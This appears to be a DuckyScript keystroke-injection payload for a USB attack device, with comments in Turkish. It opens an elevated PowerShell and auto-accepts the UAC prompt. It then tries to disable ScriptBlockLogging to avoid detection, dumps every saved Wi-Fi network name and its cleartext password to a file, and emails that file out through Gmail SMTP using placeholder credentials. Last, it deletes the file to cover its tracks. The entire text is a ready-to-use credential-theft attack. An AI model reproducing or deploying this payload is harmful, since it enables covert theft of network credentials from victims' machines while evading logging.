REM PowerShell'i yönetici olarak aç
WINDOWS r
DELAY 500
STRING powershell
CTRL SHIFT ENTER
DELAY 1000
REM Yönetici izni seçeneğini Evet olarak seçiyoruz
ALT y
DELAY 1500

REM Eğer ScriptBlockLogging Açıksa Kapat
STRING (Set-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name EnableScriptBlockLogging -Value 0)
ENTER
DELAY 500
STRING EXIT
ENTER
DELAY 500

REM PowerShell'i yönetici olarak aç
WINDOWS r
DELAY 500
STRING powershell
CTRL SHIFT ENTER
DELAY 1000
ALT y
DELAY 1500

REM Masaüstüne konumuna git
STRING Set-Location $env:USERPROFILE\Desktop
ENTER

REM Wi-Fi şifrelerini wifi_list.txt dosyasına kaydet
STRING (netsh wlan show profiles | Select-String "All User Profile" | ForEach-Object { $ssid = ($_ -split ":")[1].Trim(); $key = (netsh wlan show profile name="$ssid" key=clear | Select-String "Key Content") -replace ".*:"; "$ssid`t$key" }) | Out-File -FilePath wifi_list.txt -Encoding UTF8
ENTER

REM Mail göndermek için gerekli bilgileri ayarla
DELAY 500
STRING $securePassword = ConvertTo-SecureString "uygulama_sifresi" -AsPlainText -Force
ENTER

STRING $cred = New-Object System.Management.Automation.PSCredential("example@gmail.com", $securePassword)
ENTER
DELAY 500

REM Maili gönder
STRING Send-MailMessage -To "example@gmail.com" -From "example@gmail.com" -Subject "Wifi Passwords" -Attachments ".\wifi_list.txt" -SmtpServer "smtp.gmail.com" -Port 587 -UseSsl -Credential $cred
ENTER
DELAY 1000

REM wifi_list.txt dosyasını sil
STRING Remove-Item -Path .\wifi_list.txt -Force
ENTER
DELAY 500

REM Powershellden çıkış yap
STRING EXIT 
ENTER
